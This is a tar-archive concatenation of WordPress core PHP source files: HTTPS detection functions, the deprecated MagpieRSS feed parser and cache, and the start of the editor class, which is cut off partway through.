* Fires after the current site and network have been detected and loaded
* in multisite's bootstrap.
*
* @since 4.6.0
*/
do_action( 'ms_loaded' );
https-detection-20260606052425.php 0000666 00000013341 15224151220 0011760 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
rss.php 0000666 00000055243 15224151220 0006073 0 ustar 00 <?php
/**
* MagpieRSS: a simple RSS integration tool
*
* A compiled file for RSS syndication
*
* @author Kellan Elliott-McCrea <kellan@protest.net>
* @version 0.51
* @license GPL
*
* @package External
* @subpackage MagpieRSS
* @deprecated 3.0.0 Use SimplePie instead.
*/
/**
* Deprecated. Use SimplePie (class-simplepie.php) instead.
*/
_deprecated_file( basename( __FILE__ ), '3.0.0', WPINC . '/class-simplepie.php' );
/**
* Fires before MagpieRSS is loaded, to optionally replace it.
*
* @since 2.3.0
* @deprecated 3.0.0
*/
do_action( 'load_feed_engine' );
/** RSS feed constant. */
define('RSS', 'RSS');
define('ATOM', 'Atom');
define('MAGPIE_USER_AGENT', 'WordPress/' . $GLOBALS['wp_version']);
class MagpieRSS {
var $parser;
var $current_item = array(); // item currently being parsed
var $items = array(); // collection of parsed items
var $channel = array(); // hash of channel fields
var $textinput = array();
var $image = array();
var $feed_type;
var $feed_version;
// parser variables
var $stack = array(); // parser stack
var $inchannel = false;
var $initem = false;
var $incontent = false; // if in Atom <content mode="xml"> field
var $intextinput = false;
var $inimage = false;
var $current_field = '';
var $current_namespace = false;
//var $ERROR = "";
var $_CONTENT_CONSTRUCTS = array('content', 'summary', 'info', 'title', 'tagline', 'copyright');
/**
* PHP5 constructor.
*/
function __construct( $source ) {
# Check if PHP xml isn't compiled
#
if ( ! function_exists('xml_parser_create') ) {
wp_trigger_error( '', "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." );
return;
}
$parser = xml_parser_create();
$this->parser = $parser;
# pass in parser, and a reference to this object
# set up handlers
#
xml_set_element_handler($this->parser,
array( $this, 'feed_start_element' ), array( $this, 'feed_end_element' ) );
xml_set_character_data_handler( $this->parser, array( $this, 'feed_cdata' ) );
$status = xml_parse( $this->parser, $source );
if (! $status ) {
$errorcode = xml_get_error_code( $this->parser );
if ( $errorcode != XML_ERROR_NONE ) {
$xml_error = xml_error_string( $errorcode );
$error_line = xml_get_current_line_number($this->parser);
$error_col = xml_get_current_column_number($this->parser);
$errormsg = "$xml_error at line $error_line, column $error_col";
$this->error( $errormsg );
}
}
if ( PHP_VERSION_ID < 80000 ) { // xml_parser_free() has no effect as of PHP 8.0.
xml_parser_free( $this->parser );
}
unset( $this->parser );
$this->normalize();
}
/**
* PHP4 constructor.
*/
public function MagpieRSS( $source ) {
self::__construct( $source );
}
function feed_start_element($p, $element, &$attrs) {
$el = $element = strtolower($element);
$attrs = array_change_key_case($attrs, CASE_LOWER);
// check for a namespace, and split if found
$ns = false;
if ( strpos( $element, ':' ) ) {
list($ns, $el) = explode( ':', $element, 2);
}
if ( $ns and $ns != 'rdf' ) {
$this->current_namespace = $ns;
}
# if feed type isn't set, then this is first element of feed
# identify feed from root element
#
if (!isset($this->feed_type) ) {
if ( $el == 'rdf' ) {
$this->feed_type = RSS;
$this->feed_version = '1.0';
}
elseif ( $el == 'rss' ) {
$this->feed_type = RSS;
$this->feed_version = $attrs['version'];
}
elseif ( $el == 'feed' ) {
$this->feed_type = ATOM;
$this->feed_version = $attrs['version'];
$this->inchannel = true;
}
return;
}
if ( $el == 'channel' )
{
$this->inchannel = true;
}
elseif ($el == 'item' or $el == 'entry' )
{
$this->initem = true;
if ( isset($attrs['rdf:about']) ) {
$this->current_item['about'] = $attrs['rdf:about'];
}
}
// if we're in the default namespace of an RSS feed,
// record textinput or image fields
elseif (
$this->feed_type == RSS and
$this->current_namespace == '' and
$el == 'textinput' )
{
$this->intextinput = true;
}
elseif (
$this->feed_type == RSS and
$this->current_namespace == '' and
$el == 'image' )
{
$this->inimage = true;
}
# handle atom content constructs
elseif ( $this->feed_type == ATOM and in_array($el, $this->_CONTENT_CONSTRUCTS) )
{
// avoid clashing w/ RSS mod_content
if ($el == 'content' ) {
$el = 'atom_content';
}
$this->incontent = $el;
}
// if inside an Atom content construct (e.g. content or summary) field treat tags as text
elseif ($this->feed_type == ATOM and $this->incontent )
{
// if tags are inlined, then flatten
$attrs_str = join(' ',
array_map(array('MagpieRSS', 'map_attrs'),
array_keys($attrs),
array_values($attrs) ) );
$this->append_content( "<$element $attrs_str>" );
array_unshift( $this->stack, $el );
}
// Atom support many links per containing element.
// Magpie treats link elements of type rel='alternate'
// as being equivalent to RSS's simple link element.
//
elseif ($this->feed_type == ATOM and $el == 'link' )
{
if ( isset($attrs['rel']) and $attrs['rel'] == 'alternate' )
{
$link_el = 'link';
}
else {
$link_el = 'link_' . $attrs['rel'];
}
$this->append($link_el, $attrs['href']);
}
// set stack[0] to current element
else {
array_unshift($this->stack, $el);
}
}
function feed_cdata ($p, $text) {
if ($this->feed_type == ATOM and $this->incontent)
{
$this->append_content( $text );
}
else {
$current_el = join('_', array_reverse($this->stack));
$this->append($current_el, $text);
}
}
function feed_end_element ($p, $el) {
$el = strtolower($el);
if ( $el == 'item' or $el == 'entry' )
{
$this->items[] = $this->current_item;
$this->current_item = array();
$this->initem = false;
}
elseif ($this->feed_type == RSS and $this->current_namespace == '' and $el == 'textinput' )
{
$this->intextinput = false;
}
elseif ($this->feed_type == RSS and $this->current_namespace == '' and $el == 'image' )
{
$this->inimage = false;
}
elseif ($this->feed_type == ATOM and in_array($el, $this->_CONTENT_CONSTRUCTS) )
{
$this->incontent = false;
}
elseif ($el == 'channel' or $el == 'feed' )
{
$this->inchannel = false;
}
elseif ($this->feed_type == ATOM and $this->incontent ) {
// balance tags properly
// note: This may not actually be necessary
if ( $this->stack[0] == $el )
{
$this->append_content("</$el>");
}
else {
$this->append_content("<$el />");
}
array_shift( $this->stack );
}
else {
array_shift( $this->stack );
}
$this->current_namespace = false;
}
function concat (&$str1, $str2="") {
if (!isset($str1) ) {
$str1="";
}
$str1 .= $str2;
}
function append_content($text) {
if ( $this->initem ) {
$this->concat( $this->current_item[ $this->incontent ], $text );
}
elseif ( $this->inchannel ) {
$this->concat( $this->channel[ $this->incontent ], $text );
}
}
// smart append - field and namespace aware
function append($el, $text) {
if (!$el) {
return;
}
if ( $this->current_namespace )
{
if ( $this->initem ) {
$this->concat(
$this->current_item[ $this->current_namespace ][ $el ], $text);
}
elseif ($this->inchannel) {
$this->concat(
$this->channel[ $this->current_namespace][ $el ], $text );
}
elseif ($this->intextinput) {
$this->concat(
$this->textinput[ $this->current_namespace][ $el ], $text );
}
elseif ($this->inimage) {
$this->concat(
$this->image[ $this->current_namespace ][ $el ], $text );
}
}
else {
if ( $this->initem ) {
$this->concat(
$this->current_item[ $el ], $text);
}
elseif ($this->intextinput) {
$this->concat(
$this->textinput[ $el ], $text );
}
elseif ($this->inimage) {
$this->concat(
$this->image[ $el ], $text );
}
elseif ($this->inchannel) {
$this->concat(
$this->channel[ $el ], $text );
}
}
}
function normalize () {
// if atom populate rss fields
if ( $this->is_atom() ) {
$this->channel['description'] = $this->channel['tagline'];
for ( $i = 0; $i < count($this->items); $i++) {
$item = $this->items[$i];
if ( isset($item['summary']) )
$item['description'] = $item['summary'];
if ( isset($item['atom_content']))
$item['content']['encoded'] = $item['atom_content'];
$this->items[$i] = $item;
}
}
elseif ( $this->is_rss() ) {
$this->channel['tagline'] = $this->channel['description'];
for ( $i = 0; $i < count($this->items); $i++) {
$item = $this->items[$i];
if ( isset($item['description']))
$item['summary'] = $item['description'];
if ( isset($item['content']['encoded'] ) )
$item['atom_content'] = $item['content']['encoded'];
$this->items[$i] = $item;
}
}
}
function is_rss () {
if ( $this->feed_type == RSS ) {
return $this->feed_version;
}
else {
return false;
}
}
function is_atom() {
if ( $this->feed_type == ATOM ) {
return $this->feed_version;
}
else {
return false;
}
}
function map_attrs($k, $v) {
return "$k=\"$v\"";
}
function error( $errormsg, $lvl = E_USER_WARNING ) {
if ( MAGPIE_DEBUG ) {
wp_trigger_error('', $errormsg, $lvl);
} else {
error_log( $errormsg, 0);
}
}
}
if ( !function_exists('fetch_rss') ) :
/**
* Build Magpie object based on RSS from URL.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL to retrieve feed.
* @return MagpieRSS|false MagpieRSS object on success, false on failure.
*/
function fetch_rss ($url) {
// initialize constants
init();
if ( !isset($url) ) {
// error("fetch_rss called without a url");
return false;
}
// if cache is disabled
if ( !MAGPIE_CACHE_ON ) {
// fetch file, and parse it
$resp = _fetch_remote_file( $url );
if ( is_success( $resp->status ) ) {
return _response_to_rss( $resp );
}
else {
// error("Failed to fetch $url and cache is off");
return false;
}
}
// else cache is ON
else {
// Flow
// 1. check cache
// 2. if there is a hit, make sure it's fresh
// 3. if cached obj fails freshness check, fetch remote
// 4. if remote fails, return stale object, or error
$cache = new RSSCache( MAGPIE_CACHE_DIR, MAGPIE_CACHE_AGE );
if (MAGPIE_DEBUG and $cache->ERROR) {
debug($cache->ERROR, E_USER_WARNING);
}
$cache_status = 0; // response of check_cache
$request_headers = array(); // HTTP headers to send with fetch
$rss = 0; // parsed RSS object
$errormsg = 0; // errors, if any
if (!$cache->ERROR) {
// return cache HIT, MISS, or STALE
$cache_status = $cache->check_cache( $url );
}
// if object cached, and cache is fresh, return cached obj
if ( $cache_status == 'HIT' ) {
$rss = $cache->get( $url );
if ( isset($rss) and $rss ) {
$rss->from_cache = 1;
if ( MAGPIE_DEBUG > 1) {
debug("MagpieRSS: Cache HIT", E_USER_NOTICE);
}
return $rss;
}
}
// else attempt a conditional get
// set up headers
if ( $cache_status == 'STALE' ) {
$rss = $cache->get( $url );
if ( isset($rss->etag) and $rss->last_modified ) {
$request_headers['If-None-Match'] = $rss->etag;
$request_headers['If-Last-Modified'] = $rss->last_modified;
}
}
$resp = _fetch_remote_file( $url, $request_headers );
if (isset($resp) and $resp) {
if ($resp->status == '304' ) {
// we have the most current copy
if ( MAGPIE_DEBUG > 1) {
debug("Got 304 for $url");
}
// reset cache on 304 (at minutillo insistent prodding)
$cache->set($url, $rss);
return $rss;
}
elseif ( is_success( $resp->status ) ) {
$rss = _response_to_rss( $resp );
if ( $rss ) {
if (MAGPIE_DEBUG > 1) {
debug("Fetch successful");
}
// add object to cache
$cache->set( $url, $rss );
return $rss;
}
}
else {
$errormsg = "Failed to fetch $url. ";
if ( $resp->error ) {
# compensate for Snoopy's annoying habit to tacking
# on '\n'
$http_error = substr($resp->error, 0, -2);
$errormsg .= "(HTTP Error: $http_error)";
}
else {
$errormsg .= "(HTTP Response: " . $resp->response_code .')';
}
}
}
else {
$errormsg = "Unable to retrieve RSS file for unknown reasons.";
}
// else fetch failed
// attempt to return cached object
if ($rss) {
if ( MAGPIE_DEBUG ) {
debug("Returning STALE object for $url");
}
return $rss;
}
// else we totally failed
// error( $errormsg );
return false;
} // end if ( !MAGPIE_CACHE_ON ) {
} // end fetch_rss()
endif;
/**
* Retrieve URL headers and content using WP HTTP Request API.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL to retrieve
* @param array $headers Optional. Headers to send to the URL. Default empty string.
* @return Snoopy style response
*/
function _fetch_remote_file($url, $headers = "" ) {
$resp = wp_safe_remote_request( $url, array( 'headers' => $headers, 'timeout' => MAGPIE_FETCH_TIME_OUT ) );
if ( is_wp_error($resp) ) {
$error = array_shift($resp->errors);
$resp = new stdClass;
$resp->status = 500;
$resp->response_code = 500;
$resp->error = $error[0] . "\n"; //\n = Snoopy compatibility
return $resp;
}
// Snoopy returns headers unprocessed.
// Also note, WP_HTTP lowercases all keys, Snoopy did not.
$return_headers = array();
foreach ( wp_remote_retrieve_headers( $resp ) as $key => $value ) {
if ( !is_array($value) ) {
$return_headers[] = "$key: $value";
} else {
foreach ( $value as $v )
$return_headers[] = "$key: $v";
}
}
$response = new stdClass;
$response->status = wp_remote_retrieve_response_code( $resp );
$response->response_code = wp_remote_retrieve_response_code( $resp );
$response->headers = $return_headers;
$response->results = wp_remote_retrieve_body( $resp );
return $response;
}
/**
* Retrieve
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param array $resp
* @return MagpieRSS|bool
*/
function _response_to_rss ($resp) {
$rss = new MagpieRSS( $resp->results );
// if RSS parsed successfully
if ( $rss && (!isset($rss->ERROR) || !$rss->ERROR) ) {
// find Etag, and Last-Modified
foreach ( (array) $resp->headers as $h) {
// 2003-03-02 - Nicola Asuni (www.tecnick.com) - fixed bug "Undefined offset: 1"
if (strpos($h, ": ")) {
list($field, $val) = explode(": ", $h, 2);
}
else {
$field = $h;
$val = "";
}
if ( $field == 'etag' ) {
$rss->etag = $val;
}
if ( $field == 'last-modified' ) {
$rss->last_modified = $val;
}
}
return $rss;
} // else construct error message
else {
$errormsg = "Failed to parse RSS file.";
if ($rss) {
$errormsg .= " (" . $rss->ERROR . ")";
}
// error($errormsg);
return false;
} // end if ($rss and !$rss->error)
}
/**
* Set up constants with default values, unless user overrides.
*
* @since 1.5.0
*
* @global string $wp_version The WordPress version string.
*
* @package External
* @subpackage MagpieRSS
*/
function init () {
if ( defined('MAGPIE_INITALIZED') ) {
return;
}
else {
define('MAGPIE_INITALIZED', 1);
}
if ( !defined('MAGPIE_CACHE_ON') ) {
define('MAGPIE_CACHE_ON', 1);
}
if ( !defined('MAGPIE_CACHE_DIR') ) {
define('MAGPIE_CACHE_DIR', './cache');
}
if ( !defined('MAGPIE_CACHE_AGE') ) {
define('MAGPIE_CACHE_AGE', 60*60); // one hour
}
if ( !defined('MAGPIE_CACHE_FRESH_ONLY') ) {
define('MAGPIE_CACHE_FRESH_ONLY', 0);
}
if ( !defined('MAGPIE_DEBUG') ) {
define('MAGPIE_DEBUG', 0);
}
if ( !defined('MAGPIE_USER_AGENT') ) {
$ua = 'WordPress/' . $GLOBALS['wp_version'];
if ( MAGPIE_CACHE_ON ) {
$ua = $ua . ')';
}
else {
$ua = $ua . '; No cache)';
}
define('MAGPIE_USER_AGENT', $ua);
}
if ( !defined('MAGPIE_FETCH_TIME_OUT') ) {
define('MAGPIE_FETCH_TIME_OUT', 2); // 2 second timeout
}
// use gzip encoding to fetch rss files if supported?
if ( !defined('MAGPIE_USE_GZIP') ) {
define('MAGPIE_USE_GZIP', true);
}
}
function is_info ($sc) {
return $sc >= 100 && $sc < 200;
}
function is_success ($sc) {
return $sc >= 200 && $sc < 300;
}
function is_redirect ($sc) {
return $sc >= 300 && $sc < 400;
}
function is_error ($sc) {
return $sc >= 400 && $sc < 600;
}
function is_client_error ($sc) {
return $sc >= 400 && $sc < 500;
}
function is_server_error ($sc) {
return $sc >= 500 && $sc < 600;
}
class RSSCache {
var $BASE_CACHE; // where the cache files are stored
var $MAX_AGE = 43200; // when are files stale, default twelve hours
var $ERROR = ''; // accumulate error messages
/**
* PHP5 constructor.
*/
function __construct( $base = '', $age = '' ) {
$this->BASE_CACHE = WP_CONTENT_DIR . '/cache';
if ( $base ) {
$this->BASE_CACHE = $base;
}
if ( $age ) {
$this->MAX_AGE = $age;
}
}
/**
* PHP4 constructor.
*/
public function RSSCache( $base = '', $age = '' ) {
self::__construct( $base, $age );
}
/*=======================================================================*\
Function: set
Purpose: add an item to the cache, keyed on url
Input: url from which the rss file was fetched
Output: true on success
\*=======================================================================*/
function set ($url, $rss) {
$cache_option = 'rss_' . $this->file_name( $url );
set_transient($cache_option, $rss, $this->MAX_AGE);
return $cache_option;
}
/*=======================================================================*\
Function: get
Purpose: fetch an item from the cache
Input: url from which the rss file was fetched
Output: cached object on HIT, false on MISS
\*=======================================================================*/
function get ($url) {
$this->ERROR = "";
$cache_option = 'rss_' . $this->file_name( $url );
if ( ! $rss = get_transient( $cache_option ) ) {
$this->debug(
"Cache does not contain: $url (cache option: $cache_option)"
);
return 0;
}
return $rss;
}
/*=======================================================================*\
Function: check_cache
Purpose: check a url for membership in the cache
and whether the object is older then MAX_AGE (ie. STALE)
Input: url from which the rss file was fetched
Output: cached object on HIT, false on MISS
\*=======================================================================*/
function check_cache ( $url ) {
$this->ERROR = "";
$cache_option = 'rss_' . $this->file_name( $url );
if ( get_transient($cache_option) ) {
// object exists and is current
return 'HIT';
} else {
// object does not exist
return 'MISS';
}
}
/*=======================================================================*\
Function: serialize
\*=======================================================================*/
function serialize ( $rss ) {
return serialize( $rss );
}
/*=======================================================================*\
Function: unserialize
\*=======================================================================*/
function unserialize ( $data ) {
return unserialize( $data );
}
/*=======================================================================*\
Function: file_name
Purpose: map url to location in cache
Input: url from which the rss file was fetched
Output: a file name
\*=======================================================================*/
function file_name ($url) {
return md5( $url );
}
/*=======================================================================*\
Function: error
Purpose: register error
\*=======================================================================*/
function error ($errormsg, $lvl=E_USER_WARNING) {
$this->ERROR = $errormsg;
if ( MAGPIE_DEBUG ) {
wp_trigger_error( '', $errormsg, $lvl);
}
else {
error_log( $errormsg, 0);
}
}
function debug ($debugmsg, $lvl=E_USER_NOTICE) {
if ( MAGPIE_DEBUG ) {
$this->error("MagpieRSS [debug] $debugmsg", $lvl);
}
}
}
if ( !function_exists('parse_w3cdtf') ) :
function parse_w3cdtf ( $date_str ) {
# regex to match W3C date/time formats
$pat = "/(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})(:(\d{2}))?(?:([-+])(\d{2}):?(\d{2})|(Z))?/";
if ( preg_match( $pat, $date_str, $match ) ) {
list( $year, $month, $day, $hours, $minutes, $seconds) =
array( $match[1], $match[2], $match[3], $match[4], $match[5], $match[7]);
# calc epoch for current date assuming GMT
$epoch = gmmktime( $hours, $minutes, $seconds, $month, $day, $year);
$offset = 0;
if ( $match[11] == 'Z' ) {
# zulu time, aka GMT
}
else {
list( $tz_mod, $tz_hour, $tz_min ) =
array( $match[8], $match[9], $match[10]);
# zero out the variables
if ( ! $tz_hour ) { $tz_hour = 0; }
if ( ! $tz_min ) { $tz_min = 0; }
$offset_secs = (($tz_hour*60)+$tz_min)*60;
# is timezone ahead of GMT? then subtract offset
#
if ( $tz_mod == '+' ) {
$offset_secs = $offset_secs * -1;
}
$offset = $offset_secs;
}
$epoch = $epoch + $offset;
return $epoch;
}
else {
return -1;
}
}
endif;
if ( !function_exists('wp_rss') ) :
/**
* Display all RSS items in a HTML ordered list.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL of feed to display. Will not auto sense feed URL.
* @param int $num_items Optional. Number of items to display, default is all.
*/
function wp_rss( $url, $num_items = -1 ) {
if ( $rss = fetch_rss( $url ) ) {
echo '<ul>';
if ( $num_items !== -1 ) {
$rss->items = array_slice( $rss->items, 0, $num_items );
}
foreach ( (array) $rss->items as $item ) {
printf(
'<li><a href="%1$s" title="%2$s">%3$s</a></li>',
esc_url( $item['link'] ),
esc_attr( strip_tags( $item['description'] ) ),
esc_html( $item['title'] )
);
}
echo '</ul>';
} else {
_e( 'An error has occurred, which probably means the feed is down. Try again later.' );
}
}
endif;
if ( !function_exists('get_rss') ) :
/**
* Display RSS items in HTML list items.
*
* You have to specify which HTML list you want, either ordered or unordered
* before using the function. You also have to specify how many items you wish
* to display. You can't display all of them like you can with wp_rss()
* function.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL of feed to display. Will not auto sense feed URL.
* @param int $num_items Optional. Number of items to display, default is all.
* @return bool False on failure.
*/
function get_rss ($url, $num_items = 5) { // Like get posts, but for RSS
$rss = fetch_rss($url);
if ( $rss ) {
$rss->items = array_slice($rss->items, 0, $num_items);
foreach ( (array) $rss->items as $item ) {
echo "<li>\n";
echo "<a href='$item[link]' title='$item[description]'>";
echo esc_html($item['title']);
echo "</a><br />\n";
echo "</li>\n";
}
} else {
return false;
}
}
endif;
class-wp-editor-20260621094250.php 0000666 00000215217 15224151220 0011664 0 ustar 00 <?php
/**
* Facilitates adding of the WordPress editor as used on the Write and Edit screens.
*
* @package WordPress
* @since 3.3.0
*
* Private, not included by default. See wp_editor() in wp-includes/general-template.php.
*/
#[AllowDynamicProperties]
final class _WP_Editors {
public static $mce_locale;
private static $mce_settings = array();
private static $qt_settings = array();
private static $plugins = array();
private static $qt_buttons = array();
private static $ext_plugins;
private static $baseurl;
private static $first_init;
private static $this_tinymce = false;
private static $this_quicktags = false;
private static $has_tinymce = false;
private static $has_quicktags = false;
private static $has_medialib = false;
private static $editor_buttons_css = true;
private static $drag_drop_upload = false;
private static $translation;
private static $tinymce_scripts_printed = false;
private static $link_dialog_printed = false;
private function __construct() {}
/**
* Parse default arguments for the editor instance.
*
* @since 3.3.0
*
* @param string $editor_id HTML ID for the textarea and TinyMCE and Quicktags instances.
* Should not contain square brackets.
* @param array $settings {
* Array of editor arguments.
*
* @type bool $wpautop Whether to use wpautop(). Default true.
* @type bool $media_buttons Whether to show the Add Media/other media buttons.
* @type string $default_editor When both TinyMCE and Quicktags are used, set which
* editor is shown on page load. Default empty.
* @type bool $drag_drop_upload Whether to enable drag & drop on the editor uploading. Default false.
* Requires the media modal.
* @type string $textarea_name Give the textarea a unique name here. Square brackets
* can be used here. Default $editor_id.
* @type int $textarea_rows Number rows in the editor textarea. Default 20.
* @type string|int $tabindex Tabindex value to use. Default empty.
* @type string $tabfocus_elements The previous and next element ID to move the focus to
* when pressing the Tab key in TinyMCE. Default ':prev,:next'.
* @type string $editor_css Intended for extra styles for both Visual and Code editors.
* Should include `<style>` tags, and can use "scoped". Default empty.
* @type string $editor_class Extra classes to add to the editor textarea element. Default empty.
* @type bool $teeny Whether to output the minimal editor config. Examples include
* Press This and the Comment editor. Default false.
* @type bool $dfw Deprecated in 4.1. Unused.
* @type bool|array $tinymce Whether to load TinyMCE. Can be used to pass settings directly to
* TinyMCE using an array. Default true.
* @type bool|array $quicktags Whether to load Quicktags. Can be used to pass settings directly to
* Quicktags using an array. Default true.
* }
* @return array Parsed arguments array.
*/
public static function parse_settings( $editor_id, $settings ) {
/**
* Filters the wp_editor() settings.
*
* @since 4.0.0
*
* @see _WP_Editors::parse_settings()
*
* @param array $settings Array of editor arguments.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$settings = apply_filters( 'wp_editor_settings', $settings, $editor_id );
$set = wp_parse_args(
$settings,
array(
// Disable autop if the current post has blocks in it.
'wpautop' => ! has_blocks(),
'media_buttons' => true,
'default_editor' => '',
'drag_drop_upload' => false,
'textarea_name' => $editor_id,
'textarea_rows' => 20,
'tabindex' => '',
'tabfocus_elements' => ':prev,:next',
'editor_css' => '',
'editor_class' => '',
'teeny' => false,
'_content_editor_dfw' => false,
'tinymce' => true,
'quicktags' => true,
)
);
self::$this_tinymce = ( $set['tinymce'] && user_can_richedit() );
if ( self::$this_tinymce ) {
if ( str_contains( $editor_id, '[' ) ) {
self::$this_tinymce = false;
_deprecated_argument( 'wp_editor()', '3.9.0', 'TinyMCE editor IDs cannot have brackets.' );
}
}
self::$this_quicktags = (bool) $set['quicktags'];
if ( self::$this_tinymce ) {
self::$has_tinymce = true;
}
if ( self::$this_quicktags ) {
self::$has_quicktags = true;
}
if ( empty( $set['editor_height'] ) ) {
return $set;
}
if ( 'content' === $editor_id && empty( $set['tinymce']['wp_autoresize_on'] ) ) {
// A cookie (set when a user resizes the editor) overrides the height.
$cookie = (int) get_user_setting( 'ed_size' );
if ( $cookie ) {
$set['editor_height'] = $cookie;
}
}
if ( $set['editor_height'] < 50 ) {
$set['editor_height'] = 50;
} elseif ( $set['editor_height'] > 5000 ) {
$set['editor_height'] = 5000;
}
return $set;
}
/**
* Outputs the HTML for a single instance of the editor.
*
* @since 3.3.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @param string $content Initial content for the editor.
* @param string $editor_id HTML ID for the textarea and TinyMCE and Quicktags instances.
* Should not contain square brackets.
* @param array $settings See _WP_Editors::parse_settings() for description.
*/
public static function editor( $content, $editor_id, $settings = array() ) {
$set = self::parse_settings( $editor_id, $settings );
$editor_class = ' class="' . trim( esc_attr( $set['editor_class'] ) . ' wp-editor-area' ) . '"';
$tabindex = $set['tabindex'] ? ' tabindex="' . (int) $set['tabindex'] . '"' : '';
$default_editor = 'html';
$buttons = '';
$autocomplete = '';
$editor_id_attr = esc_attr( $editor_id );
if ( $set['drag_drop_upload'] ) {
self::$drag_drop_upload = true;
}
if ( ! empty( $set['editor_height'] ) ) {
$height = ' style="height: ' . (int) $set['editor_height'] . 'px"';
} else {
$height = ' rows="' . (int) $set['textarea_rows'] . '"';
}
if ( ! current_user_can( 'upload_files' ) ) {
$set['media_buttons'] = false;
}
if ( self::$this_tinymce ) {
$autocomplete = ' autocomplete="off"';
if ( self::$this_quicktags ) {
$default_editor = $set['default_editor'] ? $set['default_editor'] : wp_default_editor();
// 'html' is used for the "Code" editor tab.
if ( 'html' !== $default_editor ) {
$default_editor = 'tinymce';
}
$tmce_active = ( 'html' === $default_editor ) ? ' aria-pressed="true"' : '';
$html_active = ( 'html' === $default_editor ) ? '' : ' aria-pressed="true"';
$buttons .= '<button type="button" id="' . $editor_id_attr . '-tmce"' . $html_active . ' class="wp-switch-editor switch-tmce"' .
' data-wp-editor-id="' . $editor_id_attr . '">' . _x( 'Visual', 'Name for the Visual editor tab' ) . "</button>\n";
